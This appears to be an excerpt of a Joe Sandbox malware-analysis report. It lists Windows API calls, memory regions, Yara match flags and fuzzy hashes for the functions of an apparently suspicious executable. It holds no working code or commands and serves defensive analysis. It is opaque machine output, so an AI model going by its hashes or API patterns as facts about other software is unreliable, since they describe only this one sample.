                                                • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                • __alloca_probe_16.LIBCMT ref: 1000A736
                                                • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                • __freea.LIBCMT ref: 1000A837
                                                • __freea.LIBCMT ref: 1000A843
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: __alloca_probe_16__freea$Info
                                                • String ID:
                                                • API String ID: 2330168043-0
                                                • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                • __alloca_probe_16.LIBCMT ref: 1000B101
                                                • __freea.LIBCMT ref: 1000B16D
                                                  • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                • __freea.LIBCMT ref: 1000B176
                                                • __freea.LIBCMT ref: 1000B199
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 00415095
                                                • __alloca_probe_16.LIBCMT ref: 0041515E
                                                • __freea.LIBCMT ref: 004151C5
                                                  • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                                • __freea.LIBCMT ref: 004151D8
                                                • __freea.LIBCMT ref: 004151E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                                • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                                • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                                • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16
                                                • String ID:
                                                • API String ID: 3509577899-0
                                                • Opcode ID: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                                • Instruction ID: ec9159dd719152ee56e081e5dbcf39efff09a47483e4cec4d898f1dfc61a800f
                                                • Opcode Fuzzy Hash: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                                • Instruction Fuzzy Hash: DC51C172700246BFFB219F60AC88EBB7AA9FF44754B150129FE06E7160EA70ED50C670
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B62D2F
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B62D44
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B62D52
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B62D6D
                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B62D8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                • String ID:
                                                • API String ID: 2509773233-0
                                                • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                • Instruction ID: aa29f0a53a87efdca3b8d4ccbf5e30c5ab76ea25d296fa1f5bf85d65b6e82532
                                                • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                • Instruction Fuzzy Hash: 3F310635B00104AFEB14EF58DC40FAAB7A8EF48704F4541E9EA06EB251DB75AD16CB94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                • String ID:
                                                • API String ID: 3136044242-0
                                                • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                APIs
                                                • _free.LIBCMT ref: 1000C536
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000C548
                                                • _free.LIBCMT ref: 1000C55A
                                                • _free.LIBCMT ref: 1000C56C
                                                • _free.LIBCMT ref: 1000C57E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                                • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                                • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(024FEF0D,00000000,00000000,00000000), ref: 004196EF
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                                • GetLastError.KERNEL32 ref: 00419A2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                                • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                                • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                                • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04B79956
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04B79BA8
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B79BEE
                                                • GetLastError.KERNEL32 ref: 04B79C91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                                • Instruction ID: c073fabe6c199c26e3a0ace4ca3f7d44283233d76fff13b42722d94a971cc813
                                                • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                                • Instruction Fuzzy Hash: 02D16DB5E002489FDF15CFA8D880AEDBBF4FF49314F2445AAE466EB351D630A942CB50
                                                APIs
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B61C3C
                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B61C5F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileInternet$PointerRead
                                                • String ID:
                                                • API String ID: 3197321146-0
                                                • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                                • Instruction ID: 69cfd244da9a608e69bd2cb16ad7009b851131181409179ddab56424a3b9cf99
                                                • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                                • Instruction Fuzzy Hash: AFC13DB1A002189FEB25DF68CC84BE9B7B4FF49304F1041D9E50AA7290D779AE94CF91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: 755a7699ecabb4809121f894f986286a0dee8b284502aa13d34702f41478052f
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: E5518CB2701706AFEB299E50D840B6ABBA4FF20714F14C52AE845873D0E771F881C7A0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: 340d734db56ae85234b04bedce85f950010823db6834e3dc1dfd691e7d4d89b6
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: 6551D372609626AFEF298F14D840BBA77B4EF04314F1448ADD947CB290E739F990DB90
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 04B6183C
                                                  • Part of subcall function 04B69AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04B69AB5
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04B61872
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04B618A9
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 04B619BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                • String ID:
                                                • API String ID: 2123813255-0
                                                • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                                • Instruction ID: d6426903c15358d96033bd18b3cb80f0710a9c14b17eae6fd482e8f35be6797b
                                                • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                                • Instruction Fuzzy Hash: 234109B1A00300ABE7149F689C84B5AB6F8EF48314F100AB9E95BD72C0E775BD05C7A1
                                                APIs
                                                  • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                  • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                • GetLastError.KERNEL32 ref: 10007C36
                                                • __dosmaperr.LIBCMT ref: 10007C3D
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                • __dosmaperr.LIBCMT ref: 10007C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                APIs
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • GetLastError.KERNEL32 ref: 00417508
                                                • __dosmaperr.LIBCMT ref: 0041750F
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                                • __dosmaperr.LIBCMT ref: 00417550
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                                • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                                APIs
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
                                                • GetLastError.KERNEL32 ref: 04B7776F
                                                • __dosmaperr.LIBCMT ref: 04B77776
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 04B777B0
                                                • __dosmaperr.LIBCMT ref: 04B777B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction ID: f9c6555ca395e816ce5eb2016eed6f05a6ec86466c019929ece6fd78cfc82b9d
                                                • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction Fuzzy Hash: 4C216571704205AFAB10AF75CCC4C6BB7ADFF4826871085A9E93A97250EB35FC518760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                                • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
